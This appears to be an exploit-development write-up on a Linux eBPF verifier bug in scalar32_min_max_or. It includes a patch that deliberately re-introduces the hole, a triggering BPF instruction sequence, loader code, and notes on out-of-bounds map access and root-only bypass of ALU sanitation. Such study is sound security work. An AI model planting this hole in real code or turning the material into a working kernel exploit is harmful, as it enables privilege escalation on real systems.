struct bpf_reg_state {
	/* Ordering of fields matters. See states_equal() */
	enum bpf_reg_type type;
	/* Fixed part of pointer offset, pointer types only */
	s32 off;
	union {
		/* valid when type == PTR_TO_PACKET */
		int range;

		/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
		 *   PTR_TO_MAP_VALUE_OR_NULL
		 */
		struct {
			struct bpf_map *map_ptr;
			/* To distinguish map lookups from outer map
			 * the map_uid is non-zero for registers
			 * pointing to inner maps.
			 */
			u32 map_uid;
		};

		u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

		/* Max size from any of the above. */
		struct {
			unsigned long raw1;
			unsigned long raw2;
		} raw;

		u32 subprogno; /* for PTR_TO_FUNC */
	};
	/* For PTR_TO_PACKET, used to find other pointers with the same variable
	 * offset, so they can share range knowledge.
	 * For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
	 * came from, when one is tested for != NULL.
	 * For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
	 * for the purpose of tracking that it's freed.
	 * For PTR_TO_SOCKET this is used to share which pointers retain the
	 * same reference to the socket, to determine proper reference freeing.
	 */
	u32 id;
	/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
	 * from a pointer-cast helper, bpf_sk_fullsock() and
	 * bpf_tcp_sock().
	 *
	 * Consider the following where "sk" is a reference counted
	 * pointer returned from "sk = bpf_sk_lookup_tcp();":
	 *
	 * 1: sk = bpf_sk_lookup_tcp();
	 * 2: if (!sk) { return 0; }
	 * 3: fullsock = bpf_sk_fullsock(sk);
	 * 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
	 * 5: tp = bpf_tcp_sock(fullsock);
	 * 6: if (!tp) { bpf_sk_release(sk); return 0; }
	 * 7: bpf_sk_release(sk);
	 * 8: snd_cwnd = tp->snd_cwnd;  // verifier will complain
	 *
	 * After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
	 * "tp" ptr should be invalidated also. In order to do that,
	 * the reg holding "fullsock" and "sk" need to remember
	 * the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
	 * such that the verifier can reset all regs which have
	 * ref_obj_id matching the sk_reg->id.
	 *
	 * sk_reg->ref_obj_id is set to sk_reg->id at line 1.
	 * sk_reg->id will stay as NULL-marking purpose only.
	 * After NULL-marking is done, sk_reg->id can be reset to 0.
	 *
	 * After "fullsock = bpf_sk_fullsock(sk);" at line 3,
	 * fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
	 *
	 * After "tp = bpf_tcp_sock(fullsock);" at line 5,
	 * tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
	 * which is the same as sk_reg->ref_obj_id.
	 *
	 * From the verifier perspective, if sk, fullsock and tp
	 * are not NULL, they are the same ptr with different
	 * reg->type. In particular, bpf_sk_release(tp) is also
	 * allowed and has the same effect as bpf_sk_release(sk).
	 */
	u32 ref_obj_id;
	/* For scalar types (SCALAR_VALUE), this represents our knowledge of
	 * the actual value.
	 * For pointer types, this represents the variable part of the offset
	 * from the pointed-to object, and is shared with all bpf_reg_states
	 * with the same id as us.
	 */
	struct tnum var_off;
	/* Used to determine if any memory access using this register will
	 * result in a bad access.
	 * These refer to the same value as var_off, not necessarily the actual
	 * contents of the register.
	 */
	s64 smin_value; /* minimum possible (s64)value */
	s64 smax_value; /* maximum possible (s64)value */
	u64 umin_value; /* minimum possible (u64)value */
	u64 umax_value; /* maximum possible (u64)value */
	s32 s32_min_value; /* minimum possible (s32)value */
	s32 s32_max_value; /* maximum possible (s32)value */
	u32 u32_min_value; /* minimum possible (u32)value */
	u32 u32_max_value; /* maximum possible (u32)value */
	/* parentage chain for liveness checking */
	struct bpf_reg_state *parent;
	/* Inside the callee two registers can be both PTR_TO_STACK like
	 * R1=fp-8 and R2=fp-8, but one of them points to this function stack
	 * while another to the caller's stack. To differentiate them 'frameno'
	 * is used which is an index in bpf_verifier_state->frame[] array
	 * pointing to bpf_func_state.
	 */
	u32 frameno;
	/* Tracks subreg definition. The stored value is the insn_idx of the
	 * writing insn. This is safe because subreg_def is used before any insn
	 * patching which only happens after main verification finished.
	 */
	s32 subreg_def;
	enum bpf_reg_liveness live;
	/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
	bool precise;
};
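To make the interplay between var_off and the min/max fields concrete, here is a small worked example (my own illustration, not from the kernel sources; r0 is assumed to hold a map value pointer):

BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0), /* r6 = unknown scalar from a map value:
                                               * var_off = (value=0, mask=~0),
                                               * umin_value=0, umax_value=U64_MAX
                                               */
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 0xff),      /* tnum_and() leaves only the low byte unknown:
                                               * var_off = (value=0, mask=0xff),
                                               * so umin=0, umax=255, smin=0, smax=255,
                                               * and the u32/s32 bounds likewise become [0, 255]
                                               */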
The vulnerability is (re-)introduced by patching out the __mark_reg32_known() call in kernel/bpf/verifier.c:

7957c7957,7958
< 			__mark_reg32_known(dst_reg, var32_off.value);
---
> 			// `scalar_min_max_or` will handle this case
> 			//__mark_reg32_known(dst_reg, var32_off.value);
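For context, the fixed upstream scalar32_min_max_or() looks roughly like this (quoted from memory of kernel/bpf/verifier.c, so treat the details as approximate). The patch above comments the __mark_reg32_known() call back out, so the function returns without updating the 32-bit bounds whenever both 32-bit subregisters are known constants:

static void scalar32_min_max_or(struct bpf_reg_state *dst_reg,
				struct bpf_reg_state *src_reg)
{
	bool src_known = tnum_subreg_is_const(src_reg->var_off);
	bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
	struct tnum var32_off = tnum_subreg(dst_reg->var_off);
	s32 smin_val = src_reg->s32_min_value;
	u32 umin_val = src_reg->u32_min_value;

	if (src_known && dst_known) {
		/* this is the call the patch above removes */
		__mark_reg32_known(dst_reg, var32_off.value);
		return;
	}

	/* We get our maximum from the var_off, and our minimum is the
	 * maximum of the operands' minima
	 */
	dst_reg->u32_min_value = max(dst_reg->u32_min_value, umin_val);
	dst_reg->u32_max_value = var32_off.value | var32_off.mask;
	if (dst_reg->s32_min_value < 0 || smin_val < 0) {
		dst_reg->s32_min_value = S32_MIN;
		dst_reg->s32_max_value = S32_MAX;
	} else {
		dst_reg->s32_min_value = dst_reg->u32_min_value;
		dst_reg->s32_max_value = dst_reg->u32_max_value;
	}
}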
/* Calculate sign/unsigned bounds and tnum for alu32 and alu64 bit ops.
 * There are two classes of instructions: The first class we track both
 * alu32 and alu64 sign/unsigned bounds independently this provides the
 * greatest amount of precision when alu operations are mixed with jmp32
 * operations. These operations are BPF_ADD, BPF_SUB, BPF_MUL, BPF_AND,
 * and BPF_OR. This is possible because these ops have fairly easy to
 * understand and calculate behavior in both 32-bit and 64-bit alu ops.
 * See alu32 verifier tests for examples. The second class of
 * operations, BPF_LSH, BPF_RSH, and BPF_ARSH, however are not so easy
 * with regards to tracking sign/unsigned bounds because the bits may
 * cross subreg boundaries in the alu64 case. When this happens we mark
 * the reg unbounded in the subreg bound space and use the resulting
 * tnum to calculate an approximation of the sign/unsigned bounds.
 */
This function implements range tracking for the destination register after an ALU operation.
First, the destination register's var_off is updated via tnum_or(). The implementation is simple: if both bits being ORed are unknown, the result bit is also unknown. But even when one of the bits is unknown, the corresponding mask bit is cleared to 0 if the other bit is a known 1, because then the OR result is always 1:
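This is tnum_or() in kernel/bpf/tnum.c:

struct tnum tnum_or(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;   /* bits known to be 1 in either operand */
	mu = a.mask | b.mask;    /* bits unknown in either operand */
	return TNUM(v, mu & ~v); /* a known 1 overrides an unknown bit */
}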
For reference, __mark_reg_known(), whose 32-bit counterpart __mark_reg32_known() is the call removed by the patch, marks a register as holding the known constant @imm:

/* Mark the unknown part of a register (variable offset or scalar value) as
 * known to have the value @imm.
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	/* Clear id, off, and union(map_ptr, range) */
	memset(((u8 *)reg) + sizeof(reg->type), 0,
	       offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
	___mark_reg_known(reg, imm);
}
In other words, if the two 64-bit registers being ORed are both constants, it does not matter that __mark_reg32_known is no longer called in scalar32_min_max_or: the subsequent scalar_min_max_or will mark the result as a constant anyway, and nothing goes wrong. The unsoundness only appears when the 32-bit subregisters are known constants while the full 64-bit values are not; in that case scalar_min_max_or takes its non-constant path below, and the stale 32-bit bounds are never corrected:
	/* We get our maximum from the var_off, and our minimum is the
	 * maximum of the operands' minima
	 */
	dst_reg->umin_value = max(dst_reg->umin_value, umin_val);
	dst_reg->umax_value = dst_reg->var_off.value | dst_reg->var_off.mask;
	if (dst_reg->smin_value < 0 || smin_val < 0) {
		/* Lose signed bounds when ORing negative numbers,
		 * ain't nobody got time for that.
		 */
		dst_reg->smin_value = S64_MIN;
		dst_reg->smax_value = S64_MAX;
	} else {
		/* ORing two positives gives a positive, so safe to
		 * cast result into s64.
		 */
		dst_reg->smin_value = dst_reg->umin_value;
		dst_reg->smax_value = dst_reg->umax_value;
	}
	/* We may learn something more from the var_off */
	__update_reg_bounds(dst_reg);
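To make that concrete, here is a minimal sketch of a triggering instruction sequence (my own construction against the re-patched verifier above; the map setup is omitted, and r0 is assumed to hold a map value pointer):

/* r6 = attacker-controlled value loaded from a map: fully unknown scalar */
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),
/* r6 <<= 32: the lower 32 bits become a known 0, the upper 32 stay unknown.
 * Verifier state: var_off = (value=0, mask=0xffffffff00000000),
 * u32 bounds [0, 0].
 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_6, 32),
/* r7 = 1, a fully known constant */
BPF_MOV64_IMM(BPF_REG_7, 1),
/* r6 |= r7: tnum_or() yields var_off = (value=1, mask=0xffffffff00000000),
 * so both 32-bit subregs are known constants and the buggy early return
 * fires, keeping the stale u32 bounds [0, 0]. scalar_min_max_or() then sets
 * umin_value = 1, and __update_reg32_bounds() intersects the stale [0, 0]
 * with the constant subreg value 1.
 */
BPF_ALU64_REG(BPF_OR, BPF_REG_6, BPF_REG_7),

The register ends up with the impossible 32-bit bounds u32_min_value = 1 > u32_max_value = 0, a state that the later bounds deduction and branch-pruning logic was never written to handle.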
int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
if (progfd == -1)
	fatal("[-] bpf(BPF_PROG_LOAD)");

int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
	fatal("socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
	fatal("setsockopt");
/* writing to one end of the socketpair runs the attached filter once */
write(socks[1], "Hello", 5);
printf("%s\n", verifier_log);
val = 0;
map_lookup(mapfd, 0, &val);
printf("0x%lx\n", val);
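These snippets rely on a few small helpers that the text does not show. A minimal sketch (the names bpf, fatal, and map_lookup match the calls above, but this exact implementation is my assumption):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

static int bpf(int cmd, union bpf_attr *attr)
{
	return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static void fatal(const char *msg)
{
	perror(msg);
	exit(1);
}

/* read the value stored at `key` in the array map `mapfd`;
 * `value` must point to a buffer of the map's value_size
 */
static void map_lookup(int mapfd, uint32_t key, void *value)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.map_fd = mapfd;
	attr.key = (uint64_t)(unsigned long)&key;
	attr.value = (uint64_t)(unsigned long)value;

	if (bpf(BPF_MAP_LOOKUP_ELEM, &attr))
		fatal("[-] bpf(BPF_MAP_LOOKUP_ELEM)");
}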
struct bpf_map {
	/* The first two cachelines with read-mostly members of which some
	 * are also accessed in fast-path (e.g. ops, max_entries).
	 */
	const struct bpf_map_ops *ops ____cacheline_aligned;
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u64 map_extra; /* any per-map-type extra fields */
	u32 map_flags;
	int spin_lock_off; /* >=0 valid offset, <0 error */
	int timer_off; /* >=0 valid offset, <0 error */
	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	u32 btf_vmlinux_value_type_id;
	struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
	struct mem_cgroup *memcg;
#endif
	char name[BPF_OBJ_NAME_LEN];
	bool bypass_spec_v1;
	bool frozen; /* write-once; write-protected by freeze_mutex */
	/* 14 bytes hole */

	/* The 3rd and 4th cacheline with misc members to avoid false sharing
	 * particularly with refcounting.
	 */
	atomic64_t refcnt ____cacheline_aligned;
	atomic64_t usercnt;
	struct work_struct work;
	struct mutex freeze_mutex;
	atomic64_t writecnt;
	/* 'Ownership' of program-containing map is claimed by the first program
	 * that is going to use this map or by the first program which FD is
	 * stored in the map to make sure that all callers and callees have the
	 * same prog type, JITed flag and xdp_has_frags flag.
	 */
	struct {
		spinlock_t lock;
		enum bpf_prog_type type;
		bool jited;
		bool xdp_has_frags;
	} owner;
};
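The reason this layout is interesting: for BPF_MAP_TYPE_ARRAY maps, the element storage sits directly behind this header inside struct bpf_array (quoted from memory, so take the exact fields as approximate):

struct bpf_array {
	struct bpf_map map;
	u32 elem_size;
	u32 index_mask;
	struct bpf_array_aux *aux;
	union {
		char value[0] __aligned(8);
		void *ptrs[0] __aligned(8);
		void __percpu *pptrs[0] __aligned(8);
	};
};

An out-of-bounds offset computed from a map value pointer therefore lands inside struct bpf_map itself; reading below the values can leak, for example, the ops pointer, which is a kernel text address.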
Testing the OOB as root
As mentioned earlier, the ALU sanitation mitigation means the OOB access can no longer be exploited as simply as before.
In fact, if bpf_bypass_spec_v1() returns true, ALU sanitation is skipped entirely. This function returns true for root, so running as root we can still attempt the out-of-bounds access.
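bpf_bypass_spec_v1() is just a capability check (quoted from memory of the 5.x sources, so treat it as approximate); CAP_PERFMON or, transitively, CAP_SYS_ADMIN is enough:

/* include/linux/bpf.h */
static inline bool bpf_bypass_spec_v1(void)
{
	return perfmon_capable();
}

/* include/linux/capability.h */
static inline bool perfmon_capable(void)
{
	return capable(CAP_PERFMON) || capable(CAP_SYS_ADMIN);
}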
int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
if (progfd == -1)
	fatal("[-] bpf(BPF_PROG_LOAD)");

int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
	fatal("socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
	fatal("setsockopt");